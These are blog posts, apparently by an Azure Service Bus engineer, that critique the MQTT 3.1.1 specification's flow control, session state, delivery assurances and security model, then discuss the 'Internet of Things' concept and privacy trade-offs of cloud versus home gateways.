Not having any flow control can get fairly dicey when there is significant work to do for processing a message and there might be several different subsystems on the receiving end of the MQTT connection where the work differs. As MQTT offers no flow control capability whatsoever, you can thus get into the situation that in, say, a commercial vehicle telematics box is subscribed to traffic information that can just be quickly appended to a list and, simultaneously, to messages that must be shown to the driver and explicitly acknowledged. With that, you're multiplexing two streams of messages of which one you can potentially process at several thousand messages per second, while for the other one you're really depending on how the driver is willing to pay attention. Mind that there's also no message-level time-to-live information at the MQTT level that you could lean on for how long the sender is willing to wait for a reply.

In a situation like this, the required strategy with MQTT is to rip everything down from the wire as you can and process it locally or store it locally, because of the absence of flow control. You can also, to some degree, leave in-flight messages unacknowledged, but whether that's possible depends on the ordering requirements.

If there's any data stream over the connection requiring in-order delivery, then that automatically extends to all streams. Generally, the flow control issue will force messages to be flagged as consumed towards the broker, even with the at-least-once and exactly-once delivery assurance models (next section) when you have done nothing to process the message, because you need to keep getting at the messages coming up behind the one you're pulling off. MQTT lacks both flow-control and multiplexing.

The way AMQP deals with this is that it allows multiplexing of links through a single connection and has a credit-based message solicitation model, meaning that you can ask for a single message on one link and a quasi-unbounded sequence of messages on another link and thus can get "pull" and "solicit push" at the same time.

The maximum number of messages that can be kept in flight are limited by the 2-byte packet-identifier. If you wanted to maintain a high-speed transfer link with individual messages across a high-bandwidth, but high-latency network, either with very largely scaled-up TCP receive buffers or using alternate transports like UDT, MQTT will start tripping on itself at 64K in-flight messages pending acknowledgment on QoS 1 or better. With a 4 byte payload and Nagling, MQTT would you to hit that point just past 1MByte of wire footprint; 500ms roundtrip at 20 Mbit/sec.

State Management

Subscriptions must be held by the broker as long as the client maintains a session or the client tells to broker to clear out the session [MQTT 3.1.2.4] and nuke away all context established for it. What maintaining a session means is fairly ambiguous in the specification, stating "some Sessions last only as long as the Network Connection, others can span multiple consecutive Network Connections between a Client and a Server"

The ambiguity this creates is fairly interesting when taken together with the error handling strategy.

Is the server entitled to nuke all subscriptions when there is – let's say – a storage failover, while the client is connected and happens to send a message and that message can't be stored at that second? Since the server's only way to communicate errors is to kill the connection and the connection may represent the session boundary, it is legitimate for the server to throw all subscriptions out at that point, as per the specification. That does, actually, mean that the server is completely entitled to forget about all subscriptions with any sort of excuse. "It don't feel like it right now" is fine a transient condition to nuke the connection and drop everything.

Thus, following the words of the spec, the only way for a client to reliably reestablish its subscription context is to set the "clear session" flag at every reconnection attempt, and reissue the "subscribe" packets. And since it can't tell whether the server dropped the connection on purpose or the connection dropped due to some networking condition there's really no good way to optimize the behavior. Better be safe than sorry. Turns out, reissuing a receive gesture is exactly what you'd do on AMQP as well and also what you'd do with HTTP long-polling.

The downside of resetting the subscription is, of course, that the subscription's state with regard to the message stream gets lost, and you end up with an online-only subscription model with no offline capability as the subscription doesn't exist while offline. So the exact opposite strategy is to never issue a "subscribe" gesture, never set the clear session flag, and just go with the assumption that the "subscribe" gesture has been established at some point in the past. You don't subscribe; the subscription is just there. That gets you online/offline capability. Using "subscribe" on the wire does not. I'll revisit this at the end of this article.

The concept of "Will" is oddly not suffering from the same ambiguity issues. The intent here is straightforward in allowing the client can park a message that says "I'm no longer here, because I'm network-unreachable", which is a way to implement presence functionality, i.e. turn the "is present" flag off. For "Will", the rules are very clear in that it's tied to the network connection.

Resource Governance

Compared to MQTT 3.1, the OASIS MQTT 3.1.1 spec clarifies [MQTT 4.7.3] that topics are not generally dynamic and may be predefined. It also clarifies that there "may be a security component that authorizes access to certain topics". That's a more than necessary addition to the specification, especially when considering the existence of the "retain" flag. What the spec also ought to mention is that the way to express an authorization failure is to disconnect the client and that the client won't ever know why that happened.

The retain flag [MQTT 3.3.1.3] requires the server to retain the given message, of whatever size, on the topic, so that it will be delivered to "any future subscribers when subscriptions match the topic name". Any subsequent message with that flag will replace the existing message with "retain".

Dynamic topics in conjunction with this retention model are nice puzzle to solve, because a single publisher client can stuff a server with messages on randomly named topics that nobody will ever pick up, and the server can't effectively defend against that other than not offering dynamic topics or tracking dynamic topic use with a per-user (not per client-identifier) quota.

If authorization were defined, the retention model would likely require a special level of authorization beyond "send" permission, since the "retain" message is a shared resource that ought to have special protection; a client's set "retain" message ought to have a guarding mechanism against undesired overrides by some other, lesser privileged client. This is similar to the permission to allow creating sticky posts in web forums, which usually requires administrative permission.

I've chosen to not implement support for "retain" not only because of resource governance and authorization concerns that will have to be solved, but also because it requires immediate broker support, and will require special behavior for all other protocols on a multi-protocol broker. "Retain" is conceptually interesting, but I think I would like an explicit broker feature that works cleanly across protocols even more; some (any) explicit customer use-case demand for the capability would also help bumping the priority up.

Delivery Assurances

Next we'll take a look at delivery assurances. MQTT defines 3 levels of "Quality of Service". Level 0 is providing best effort, "at most once" message delivery assurance. Level 1 aims to provide an "at least once" message delivery assurance, and Level 2 even an "exactly once" delivery assurance.

Unfortunately, MQTT defines this assurance model only for the publish gesture and not for its own, inherent operations, which is a good source of confusion. For instance, if you're creating a subscription, and creating the subscription succeeds while the route to the client collapses (let's say due to mobile national roaming, switching towers) just as the server is sending the "suback" response, then it's not unlikely that the client will come back to reconnect to some other server node before the current server node even knows what's going on, and as the server is still waiting for the socket to collapse, hanging on the timeout for the pending response. At that point, does a subscription exist for the client in spite of the client not having received "suback"?

It's not clear what the correct behavior ought to be. The client could interpret the disconnection as a network failure occurring before or after "subscribe" could be delivered, or a failure to establish the subscription due to any transient server condition, such as an ongoing server node failover or any other reason. It can't know. The server node will look to send the "suback" command back to the client, but there is no rule about what happens to the subscription when that fails. "Suback" is (implicitly) a QoS 0 message, and it is therefore inherently acceptable to lose it, and thus the subscription probably ought to stand. The client can't distinguish these cases due to the broken error handling model and will be in doubt about whether the subscription exists.

That means the client is forced to retry under any such circumstances. The specification already anticipates this with making subscriptions effectively idempotent and requiring that a subscribe command matching an existing subscription must be replaced by a new subscription and that the message flow must not be interrupted.

This case shows how MQTT's lack of separation between the message transfer model on one side and overlaid semantics on the other is quite problematic. "subscribe" and "suback" ought to be messages that are both delivered with "at least once" assurance if the subscription were indeed held durably. Thus, if a subscription has been established as a connection collapses, "suback" would instead be delivered on the reestablished connection. MQTT's reliable payload message transfer model realized with "publish" and related acknowledgements isn't available for the MQTT management operations and that hurts their reliability semantics.

The "fire and forget" QoS level 0 is helped by the client. The client will try once and if it fails to get the message to the server, for whatever reason, it will instantly give up. That ensures "at most once" by ways of client cooperation with the rule, but there's no governance opportunity for the server.

The QoS 1 "at least once" model with publish and puback provides a reasonable level of assurance to the client about whether a message has been accepted by the broker when puback gets back through. Until the client has received puback, it must hold on to any sent messages and if there is any failure condition, the client will set the "dup" flag [MQTT 3.3.1.1] in a retry copy of the message and send again. The presence of the "dup" flag allows the server to determine that this is a retry. If the server has already sent puback for a given packet identifier, it must treat the message as a new publication [MQTT 4.3.2-2].

The "dup" flag is a bit of a mystery. Personally, I don't know what to do with it. The spec is clear that I can't rely on having seen a previous package with "dup" set to 0 – which is logical as the client can have run into a local network condition as it tried to put the first packet on the wire. It escapes me what I do with the knowledge that the client has retried sending this packet at least once (I may be looking at the umpteenth resend) and the specification is no help. It states that a set "dup" flag indicates a retransmission, but there's no rule that depends on it. This smells like protocol baggage.

The QoS 2 "exactly once" assurance is the assurance level that I, so far, chose to not implement, largely because I have serious doubts about it being possible to provide "exactly once" as an end-to-end assurance in a scale-out messaging system, and if the assurance can't be given end-to-end it makes little sense to provide it on any of the legs.

Without going into too much detail, there are a range of edge-case error conditions that can occur in large high-throughput, multi-node broker systems where you'll favor duplicating a message over potentially losing it completely. That's especially true in cases where the gateway and the broker run on different nodes, and the gateway hands off a message straight into a broker failover situation. In that case, the broker might just get the message off to disk but doesn't get a chance to report that fact back to the gateway. In traditional transactional systems, you would span a transaction from the client over to the message store to ensure consensus on the outcome of the operation so that the broker won't make the stored message available for consumption until the client permits it, but many contemporary scale-out broker systems can't and won't subject their stores to transaction-scope control by untrusted clients for availability, reliability, and security reasons.

MQTT tries to mimic that traditional transaction model similar to how Azure Service Bus's proprietary SBMP protocol (which is phased out in favor of AMQP) mimics it. The message gets published with publish and the server stores and holds it. The server then confirms the receipt with pubrec, which establishes consensus between client and server that the server has the message safely in hands. The client then issues pubrel to permit the server to publish the message, which is confirmed by the server with pubcomp. The pubrel/pubcomp exchange is a QoS 1 exchange, meaning the client will repeatedly reissue the pubrel message until it receives a pubcomp confirmation. Oddly, the client isn't allowed to set the "dup" flag on these retries [MQTT 3.6.1], which underlines my suspicion that the "dup" flag is largely protocol fluff or is someone's implementation detail seeping out into the spec.

MQTT's QoS 2 prescribed exchange will, if successful, achieve transferring exactly one message copy to the server. The pattern is a path well-traveled. It aims not to ensure that exactly-once delivery is achieved end-to-end with the publisher knowing that delivery has been successful.

The reason I didn't implement QoS 2 is that I would have to make a transactional scale-out store to hold on to these messages that would have to live outside of the actual broker to keep the promise I make in pubrec. Without deep integration with the broker message store, I would actually just move the problem by one layer and might still only get "at least once" assurance. I explain this more in the next section.

To make the model solid, the broker backend behind an MQTT gateway must immediately support the transaction gestures on its store, meaning the broker would have to store and lock messages handed to it, and then promise not to forward them until a second gesture clears them for forwarding. There's an interesting abuse vector here in that you could potentially stuff a server with messages and never release them. The specification's section on ordering [MQTT 4.6] cites an undefined "in-flight window" (which appears to be an implementation detail of IBM's MicroBroker that has no place in an OASIS spec) in a non-normative comment and speaks about how restricting in-flight messages will address this.

Data Retention and Failover

Since I'm looking at MQTT from the perspective of building a scaled-out broker infrastructure, the reliability semantics of the protocol are inseparable from the failover behavior, as failover – meaning that a server node shuts down for any reason and another node kicks in to replace it – is how any large scale system stays available.

On failover, the first interesting aspect is the maintenance of the session-related state across all frontends. MQTT's state-management semantics work out to demand either a "CP" state management backplane ("CP" means consistency-biased per the CAP theorem) or no cross-node state management, at all.

Directly copying from the specification [MQTT 3.1.2.4], the session state on the server consists of the following:

  • The existence of a Session, even if the rest of the Session state is empty.
  • The Client's subscriptions.
  • QoS 1 and QoS 2 messages which have been sent to the Client, but have not been completely acknowledged.
  • QoS 1 and QoS 2 messages pending transmission to the Client.
  • QoS 2 messages which have been received from the Client, but have not been completely acknowledged.
  • Optionally, QoS 0 messages pending transmission to the Client.

The rules on state retention [MQTT 4.1] are disappointingly noncommittal for a specification that imposes so many state retention obligations on a server. Session state (and therefore the session) must be maintained for as long as the network connection exists, but beyond that it can be liberally discarded based on time, administrator action, because arbitrary stuff goes wrong (state corruption), because of resource constraints, or a full moon. It's compliant to shout "error!" and throw all state away and the client will have to cope with it.

Sadly, this noncommittal attitude of the specification also throws all QoS 1 and QoS 2 assurances straight out of the window. A client that has established a subscription on which it expects QoS 2 message delivery of presumably important data on a topic, and that gets disconnected for any reason (including the server having the hiccups) gets absolutely no assurance at the state retention layer that either the subscription or the in-flight QoS 2 messages will be retained and held available for a reconnect.

Mind that I can't let the excuse "it depends on what the implementation does" count. Either the specification provides me with watertight assurances or it does not. MQTT does not. It doesn't even try.

It's wishy-washy with "some" and "others" (MQTT 1.2, "Some Sessions last only as long as the Network Connection, others can span multiple consecutive Network Connections between a Client and a Server.") or "can" (MQTT 3.1.2.4 "The Client and Server can store Session state to enable reliable messaging to continue across a sequence of Network Connections"). There's no MUST or even just SHOULD with regards to retention rules.

But let's assume the spec were more assertive and let's go through the session state items that the protocol asks to retain for the duration of a session. Let that be until the client disconnects or a timeout that is known to both parties a priori (that's my alternate definition, not the spec's). I've taken the liberty to reorder the item list from the spec for the purpose of a better flow of explanation.

For the following discussion I will assume that the node running the MQTT broker will be one of at least two in a farm and one of them fails (assume an instant death due to a power-supply failure) and the other needs to kick in as the failover secondary, with the client instantly reconnecting to the other node.

  • The existence of a Session, even if the rest of the Session state is empty – A session exists when there's an ongoing relationship with a particular client-id. The fact that there is a session must be retained and all subsequent items are presumably to be anchored on that session. The session is [MQTT 3.1.2.4] "identified by the Client identifier" so there must only be one. In fact, the client-identifier really ought to be called session-identifier, because using a true client identifier has fairly negative security implications, as I'll discuss in the next section. If client state has to be retained across connections and server nodes in a failover situations, the immediate consequence from this most basic rule is that if you are indeed retaining session state, you cannot return connack (which confirms establishing or recovering a session) until all server nodes have access to a replica of this fact. The spec doesn't say that.
  • The Client's subscriptions – Client subscriptions are subject to the same considerations and I already touched on the in-doubt issues with suback in the previous section. If subscriptions ought to survive network connections and they have QoS 1 or QoS 2 assurances attached, the record of their existence must be known by all server nodes before suback is returned. The spec doesn't say that. I'm cutting the spec some slack for QoS 0, because those subscriptions could indeed be replicated in an eventually consistent manner as fumbling some messages is inherently acceptable while the replica propagates.
  • QoS 1 and QoS 2 messages pending transmission to the Client – Since we presumably have a broker with peek-lock and server-side cursor support for subscriptions backing the MQTT implementation, this is a straightforward requirement to fulfill as it means that messages available on the subscription but not yet delivered will be retained. Brokers do that.
  • Optionally, QoS 0 messages pending transmission to the Client – see above.
  • QoS 1 and QoS 2 messages which have been sent to the Client, but have not been completely acknowledged – Here it gets very interesting, because we're required to log the in-flight client interactions on a per-session basis in a way that any server node in the farm can instantly take over redelivery. For QoS 1 and with the protocol implementation backend by a broker, this is not all that hard if the broker counts delivery attempts so that you can set the "dup" flag correctly (which is required for protocol compliance in spite serving no purpose I can see). For QoS 2, being failover-safe practically means that you will either have to distribute the fact of pending pubrel throughout the farm on a per session-basis before you send it, and also garbage collect that data after you receive pubcomp, or – easier – have to run pubrel through the backend broker, since you need to remember pending deliveries of that message just as you have to for the "publish" message per-se. The tradeoff for "easier" is that you're running edge-protocol specific control messages through the backend broker.
  • QoS 2 messages which have been received from the Client, but have not been completely acknowledged – This requirement is quite tough in a scale-out failover model unless you immediately own the broker store or the broker allows for a model of queuing messages under a lock. You will have to retain all these messages received via "publish" for access by all (secondary) nodes across the farm before you return "pubrec", but without having them committed into (or released from) the broker for delivery until the matching "pubrel" is received.

I didn't implement QoS 2 for the time being, since I can't fulfill the last QoS 2 retention requirement with the broker I'm using. Azure Service Bus does indeed support queuing messages under a lock when using transactions, but losing the client and client connection triggers the transaction being abandoned. I'm in the lucky position to be able to ask our broker development team directly for an extension of that capability to allow for a lock that can be explicitly managed, and I might actually do that; this will not, however, solve the replication problem of all potential secondary nodes having to know about that lock at the protocol gateway edge and its association with the client-id and the sequence-id, meaning that in addition to the lock, there's information about the lock that the gateway needs to retain server-side.

MQTT is far from easy to implement if you want to do it correctly, and across more than one server node.

I believe that MQTT specifically suffers from the madness of the attempt of providing reliable messaging using a "solicit push" pattern, where the solicitation of an unbounded sequence of messages occurs when the subscription is established, and the delivery of those messages is potentially subjected to the Qos 1 or 2 delivery assurances defined in MQTT. With a "pull" based model that separates establishing subscriptions and message solicitation, you can leave delivery resumption control to the client, with MQTT those two aspects are coupled.

AMQP also supports sophisticated patterns for resumption of links with all in-flight deliveries being retained intact and those are just as hard to do at scale, but it's a perfectly valid option there to have all deliveries fail out and make the clients ask for messages again once they reconnect. "Pull" provides a way for push the in-flight problem out to the clients, and make scale-out scenarios more reliable. HTTP follows the same principle (not having server interactions interdepend is an aspect of REST).

Because of these state management considerations, my particular implementation choice for MQTT is to not implement state retention, at all. Instead, I turn the actual establishment of a per-client subscription into an out-of-band gesture and reinterpret the MQTT "subscribe" gesture to mean receive (or push-me-stuff-while-this-connection-lasts) on that pre-existing backend broker (Topic-) subscription.

That means I'm intentionally coupling all MQTT semantics to particular connections; which also means I can't provide QoS 2, but that's fairly easy to replace with message deduplication on the client, anyways.

That separation also enables an interesting trick that I already alluded to earlier:

If I wanted to save the "subscribe" gesture upon connection for footprint reasons, the pre-existing and decoupled backend subscription will allow me to pretend that "subscribe" has been issued on a previous connection in ancient history. With that model, and if the client never uses the "clear session" flag, I can provide instant "solicit push" on the topic associated with the client with QoS 1 assurances over the existing backend topic; extra "subscribe" gestures are basically ignored.

Security

MQTT 3.1.1 Section 5 states "As a transport protocol, MQTT is concerned only with message transmission and it is the implementer's responsibility to provide appropriate security features. This is commonly achieved by using TLS", i.e. security is your own problem.

Punting on security doesn't stop the spec authors from including a few pages of mentions of security and even regulation considerations, including references to Sarbanes-Oxley (!), the NIST Cyber Security Framework, and PCI-DSS, all of which MQTT has absolutely nothing to do with or enables in any particular fashion. I find the name-dropping disturbing and I feel like there's an attempt to trick me into believing there relationships where there are none.

It continues when after mentioning TLS as an option, the security section also mentions that "Advanced Encryption Standard [AES] and Data Encryption Standard [DES] are widely adopted" (btw, DES is also very much broken, thank you) and that "Where TLS is used, SSL Certificates sent from the Client can be used by the Server to authenticate the Client" and goes on name dropping some details of X.509 and TLS until the rest of the section.

The only enlightening part of the MQTT security section is [MQTT 5.4.8] on Detecting Abnormal Behaviors, which enumerates a few actual threats that MQTT implementations ought to be able to monitor and defend themselves against. Unfortunately, this "for example" list is far from complete and doesn't represent any thorough analysis.

The first suggested measure is that "Server implementations might disconnect Clients that breach its security rules" (which is fairly handy as that's how MQTT deals with every error), and the second measure is to implement a dynamic block list based on identifiers such as IP address or Client Identifier or to punt the problem up to the firewall in a similar fashion. That's all reasonable advice for any network protocol.

Remember: "It is the implementer's responsibility to provide appropriate security features". The problem is that if there is no security, there is no solution; in no commercial environment. And without having a well-defined security model, there is no interoperability.

There are some pretty evil threat vectors looming around MQTT that the specification doesn't mention.

The gravest mistake in the specification is that it fails to mandate that the Client Identifier, and therefore the associated session state, MUST be tied to the authenticated client initiating a session, meaning that a Client Identifier MUST only be used by the authenticated client while such a session exists.

Without this rule, which I'm providing here, any client with access to the server that has knowledge of an existing Client-Identifier can walk up and steal the session when the owning client happens to be disconnected for any reason, which obviously includes, as we know, transient server error conditions for which MQTT's error model is to disconnect the client.

Naming the Client-Identifier what it is makes this threat fairly real as it suggests a fixed association of the client instance and the server. If MQTT were implemented in a device that holds an extractable credential (username/password or certificate) and the Client Identifier were chosen to be some obvious identifier such as the device's serial number, taking ownership of one device would potentially enable an attacker to hijack all sessions on that server. Hijacking a session does include taking over all previously established subscriptions, which means that even if there were an authorization model for Topics that were used during "subscribe", this approach would allow the attacker bypass the authorization boundary.

If the identifier were named Session-Identifier, implementers would more likely lean to make it an ephemeral and quasi random value (like a GUID) and that's much harder to guess.

Conclusion

For the last 7 years I've been involved in shipping one of the biggest, if not the biggest multi-tenant, multi-datacenter, transactional, cloud-based message-broker in the world, with several 10,000 concurrent tenants across nearly 20 global datacenter locations: Microsoft Azure Service Bus.

Do I have a conflict of interest debating a pet protocol of one of our competitors? Maybe; you'll be the judge of whether this analysis is biased. If you ask people who know me personally they'll tell you that I will call a spade a spade.

I very strongly believe that MQTT 3.1.1 cannot be implemented correctly providing anything but QoS 0 assurance at the scale we provide, and I'm not feeling comfortable of providing anything but a QoS 0 assurance for MQTT by the words of the spec, because MQTT 3.1.1 is a fundamentally broken protocol at the present time. I can still provide "at least once", but only with the mentioned workaround of assuming that subscriptions for a given client are established out of band.

I have implemented it, however, because customer are asking for it. Some customers who are asking are already using it and for those I see the implementation as a way to move them forward from where they are. Some customers are looking at fresh implementations of MQTT and for those (you) I wrote this analysis so you can read the specification informed by an implementer's perspective. If MQTT remains your choice, I will try to make you as successful with it as I can, but there will be limits to the lengths I can go due to the inherent deficiencies. There were times when technical pride would get in the way of folks working at Microsoft supporting what the customers demand; that's not my notion of running "services".

MQTT needs significant changes and I think MQTT can opt for one of two potential rescue paths. The pity is that both ways will and ought to lead to its destruction as it gets too close to viable and modern alternatives.

Either MQTT brutally simplifies and gets rid of all the cruft, while taking on its debt, and there most predominantly extensibility. On that route, it'll become quickly indistinguishable from JSON-over-WebSockets or particular incarnations of that model like Node's socket.io or ASP.NET's SignalR, and this includes wire footprint.

The alternative is that MQTT fixes all of its reliability deficiencies including ditching the "solicit push" model spanning connections, the awful error handling model, and its lack of multiplexing support, but then we're getting mighty close to AMQP 1.0. Which IBM doesn't seem to want to support in any serious fashion. For a reason. See up above.

MQTT is an old, recycled, and often weirdly inconsistent mess. It's not a good protocol, and certainly not a good protocol for the Internet of Things where we will look connect devices with long-haul links with unpredictable network conditions, and I believe it's unfixable without becoming something different entirely. We ought to know better, and OASIS also ought to know better.

[Update: Some reactions covered in this post]

Categories:

[This is a follow-up post to "Internet of Things or Thing on the Internet?"]

The metaphor "Internet of Things" stands for the next wave of expansion of scope for distributed systems.

We started the journey with centralized systems, single computers, that you had to walk up to and control with switches and that were later able to be fed with batches of punch cards allowing distributed creation of jobs with centralized processing. We then took the step of introducing the notion of terminals; remote control screens that allowed immediate interaction with the central computer by allowing interactive composition of jobs that were then fed into processing. The advent of PCs and PC-technology based servers and later smart phones then led to a decentralized landscape where personal functions are personal and shared functions tend to live at an appropriate scope for the respective audience, may that be a work group sharing on a department server, a company sharing in a datacenter, or the general public sharing on a public web site.

Cloud-based systems are increasingly challenging this model as personal data gets held and processed in the cloud since people now increasingly own multiple digital devices, work groups are becoming less dependent on particular locations, and companies realize the advantages of lower operating cost when they delegate work to cloud providers.

What has remained stable across most of the waypoints in this journey since the introduction of terminals is that there is, in the majority of systems, some form of human interaction through a human-machine-interface, motivating actions in a program at an appropriate scope, and the resulting output is presented to the same person or someone else through another such interface. Information flows. That information flow can be fairly immediate as with myriads of database-frontend applications, or far decoupled as with a cash register clerk's input (even by way of a scanner) ultimately rolls up into a cell of a financial balance sheet in Excel. Ultimately, the vast majority of software developers has so far built pure information technology systems. People put data in, and people get the same or a transformation of that data out. Put differently, information technology systems are intermediated from the physical world through people.

"Internet of Things" is a metaphor for an evolved kind of systems where that intermediation is removed.

Instead of a human observing the state of the physical world and submitting that observation into a system – which obviously can take the form of pointing a camera at an object, so we're not talking about keyboard input – we allow systems to make such observations for themselves and on a continuous basis. We're giving systems eyes to see, ears to hear, and noses to smell and sense pollution, and other senses to feel temperature, humidity, acidity, atmospheric pressure, vibration, acceleration, orientation, altitude, or geographic position.

These senses manifest in devices, aptly named sensors.

We're also giving systems the power to change the state of physical world objects as a result of these observations and additional inputs. Aircraft auto-pilot systems have long been implementing actuation of control surfaces based on sensor observations and many advanced military aircraft types would not be flyable at all without such digital avionics. Autonomous vessels and vehicles operate in the same fashion.

But even in scenarios that seem to be human-controlled at first blush, such as unlocking a vehicle just borrowed from a car sharing service with a smart phone app gesture, the decision whether the car will indeed unlock is made by the car sharing system based on an authorization verification and subsequent command routing decision to the right vehicle. A person pushes a button, but the actual unlock command is issued by the system based on a decision sequence.

Having (remote) systems be the judge in decision making, especially around authorization, will also be important in many scenarios where the mainline communication occurs peer-to-peer. You may interface with digital tools like a projector and a digital whiteboard in a conference room or a game console in your entertainment rack in a peer-to-peer fashion for optimizing latency, but the matchmaking will commonly aided by a system that helps ensuring that only authorized and trustworthy people can participate in the peer-mesh, even if they all happen to sit in the same room.

The role that these devices, including the car's telematics box interfacing with the CAN bus, play towards the systems is that of "peripherals". That's is obviously a very well-known concept for which we have very-well understood models of how we attach input sensors like mice and keyboards or actuators like printers. What the "Internet of Things" changes is that these peripherals often become attached over long-haul links, and are not attached to singular computers but to distributed systems. But in principle, the telematics box in the car or a light pole on the street are not different from printers from an architectural perspective.

What they also share with contemporary printers is the ability to communicate their current condition. A modern ink-jet or laser printer will always let you know when it is a good time to go to the store and buy fresh Original Brand™ ink or toner as the supply and it will do so via telemetry information sent to the computer hosting the driver.

What "Internet of Things" changes quite radically is the ecosystem breadth and diversity. There are many protocols and standards and systems and it's not like the operating systems made by two or three dominant players get to call the shots on how all devices are communicating, because there are very many modes of communication and broadly varying scenarios. Diversity will be the norm and there will be plenty of innovation on the communication front challenging the status quo.

The key innovation of the "Internet of Things" concept is that we're equipping distributed systems with senses that allow them (their programs) to acquire information in a self-motivated fashion, to make decisions, and to actuate things in the physical world as a result. Systems are the focus, not the things. The things are peripherals.

Categories: Architecture

I just read the post Privacy in the Smart Home - Why we need an Intranet of Things by Kai Kreuzer from the openHAB.org project in which he is advocating an "Intranet of Things" enabled by a local integration hub, which is a model I refer to as "local gateway" in my "Service Assisted Communication" for Connected Devices post:

All connections to and from the device are made via or at least facilitated via a gateway, unless the device is peered with a single service, in which case that service takes on the role of the gateway. Eventual peer-to-peer connections are acceptable, but only if the gateway permits them and facilitates a secure handshake. The gateway that the device peers with may live on the local network and thus govern local connections. Towards external networks, the local gateway acts as a bridge towards the devices and is itself connected by the same set of principles discussed here, meaning it's acting like a device connected to an external gateway.

OpenHAB is an integration hub and automation software for home automation that runs on top the JVM across a range of platforms and also scales down to the Raspberry Pi. A motivation for Kreuzer's post seems to be to announce the new companion service:

To cater for secure remote access, we have furthermore just started a private beta of a new service: my.openHAB will provide you the ability to connect to your openHAB over the Internet, securely, through commercial SSL certificates, without a need for making any holes in your home router and without a need for a static IP or dynamic DNS service. It does not store any data, but simply acts as a proxy that blindly forwards the communication.

The reason I'm picking up the post and comment on it here is twofold: First, the way how openHAB acts towards devices and how it federates with its "my.openHAB" service is a splendid illustration of the "Service Assisted Communicated" principles I spelled out in my write-up. Mind that I explicitly mentioned there that they're broadly implemented already and this is supporting evidence. Second, while I agree with the architectural foundation and I do find a pure "Intranet of Things" notion interesting, I don't think that's how things will play out in the long run, and I also believe there is, very unfortunately, a bit too much fear-mongering involved in trying to bring the point home. I also think there's a discussion to be made about explicit privacy tradeoffs.

The key concerns that are being raised are the following:

  • You are not the owner of your data; everything is sent to the cloud server, if you wish it or not. What happens with the data is not decided by yourself, but by the cloud service. You will only receive results of the data mining processes, be it as "smart" actions being triggered or as a colorful time series chart. I always thought of this as a no-go and wondered that other people did not mind this fact. […]
  • Even if you have full trust the cloud service company, the NSA affair should have shown you that your data is sniffed and stored in dubious places around the world. […]
  • Every device that creates a connection to a cloud service is a potential security risk. Most of these devices are embedded systems and many lack the possibility of receiving firmware updates for vulnerabilities. There are already many examples where such systems have been hacked - e.g. for heating systems or IP cameras. […]

Let's look at these.

First, whether or not you are owner of your data when using a cloud service is a matter of the service's clear and explicit privacy policy as well as of legal regulation. I am personally an advocate of regulatory frameworks governing the use of telemetry and am pointing out the importance of implementation of clear privacy policies including ways for customers to opt out of data collection and having any previously collected data provably destroyed.

But I also believe that telemetry data collected by manufacturers of devices will yield better products and will help making these products more reliable as we use them.

The privacy problem is not one of "cloud". The problem is whether you trust the manufacturer and service provider and whether you understand the policies. If the privacy policy is 5 pages of 5pt legalese, return the product to the store or don't connect it to a network, ever. Because however good your intentions about keeping things private are, if a regular consumer buys a network-enabled appliance and connects it to a local network, that device will, in very many cases, promptly phone home to the manufacturer saying at least that it has been activated and it will do that ignoring the fact whether there's a home hub on the network. That is not a cloud problem. That is a device problem. What is the device gesture to opt into the "customer experience improvement program"?

I strongly believe that very many customers, indeed the vast majority, will gladly make a privacy tradeoff if they see obvious benefits and when the service provider is honest and transparent about what is being collected, what the customer's rights are, and if the customer can trust that an opt-out leads to an effective destruction of the raw data they've contributed and any data that could further be traced to their identity. There's obviously a gray zone on aggregate data. Opting out now clearly won't change the count of "How many dishwashers were activated in the city of Mönchengladbach in January 2014". Earning trust with concerned customers means to draw the line on that gray zone clearly. What if the manufacturer cheats? Sue them along with 10,000 of your best friends.

The way we can make this scale is by supervision. I believe it would possible to have a globally standardized and auditable privacy practices seal along the lines of ISO 900x by 2018 and ways to anchor this privacy seal into the consumer hive-mind by that time. "If it doesn't carry this label, don't buy this product." The existence of that seal will also make competitors having a very close eye at their respective practices and be loud if they see the other infringing.

Once there is clarity and auditable process on privacy practices and data collection is opt-in, only then we can even get to the question of consumer choice. All of this is a prerequisite for even enabling consumers to make a choice between a local hub and a cloud service to connect your devices to. Without such a framework, manufacturers can largely do whatever they like once you give the devices network.

What benefits would customers trade some of their data privacy for? Remote control of devices around the home, energy efficiency management for their heating and cooling systems, avoiding utility grid black-/brownouts with service credit for opting in, device feature updates, general usage statistics, seamless home/mobile/work user experiences, rental property management, and more. Most scenarios that go beyond simple remote control and local stats do require data pooling in the cloud and producing insights that manufacturers, service providers, and utilities can provide higher level services on top of. Some people will find it creepy when they get a notification that the grinder in their coffee-maker is about to fail due to wear and tear and whether they want to have it replaced – I, for one, would welcome that with open arms.

Kreuzer's second point about the NSA and other government agencies is one that I'm sympathetic with, but it's also a sad one to bring up, because he's announcing a service that falls into the same category as all cloud services and he's assuming that an Intranet is generally safe from snooping. Let me preface this with the reminder that I'm speaking for myself and not at all for my employer here. Fact of the matter is that when the government of the country where the gateway service is hosted walks in with a court warrant, the good intentions come to a screeching halt or the service does. It is in the best commercial interest of all public cloud providers to keep customers data private as much as it is in the altruistic best interest of openHAB. The motivations may differ, but the goal is the same. We all want to lock the spies out and will do so until the Gewaltmonopol (state's monopoly on physical force) shows up. The state's ability to force providers to act against their will and goals also extends to the telecom operators and has done that for decades. If you bring up "NSA" as an argument for keeping things in the Intranet, you will also have to allow the conspiracy theory that operator-supplied cable and DSL modem-devices can be abused as bridge-heads into local area networks.

With this I am not defending, belittling, or justifying anything that we've learned about recently from the Snowden disclosures. I believe we've been betrayed by the governments, but fixing this is a political cleanup task and not a technical one. If the state shows up with a court order (even secretly if allowed by law) they're entitled to whatever that order says. If there's no such order, the government is clearly acting against the law – which computer systems can't read and interpret. What we can do is tighten security across the board, but it's an illusion to consider the "Intranet" a safe haven.

Which gets me to the third point about "every device that creates a connection to a cloud service is a potential security risk" which I consider to be tragically shortsighted. If we broaden the scope, though, it becomes instantly true: "every device that creates a connection is a potential security risk".

Home Intranets are the least defended and most negligently secured network spaces in existence. If you connect a BluRay player or Smart-TV or the legendary Refrigerator to your home network, that device has a very broad bouquet of options to see things and talk to things. And you will have no idea what it actually does unless you're skilled enough to use a tool like Wireshark for traffic analysis, which is only true for total network geeks.

In all actuality, it frightens me much less that the Refrigerator sends an hourly health-status package to the manufacturer than the Refrigerator having any access to anything on my network without me explicitly approving that. For the exact reasons that Kreuzer cites: Most of these devices are embedded systems and many lack the possibility of receiving firmware updates for vulnerabilities.

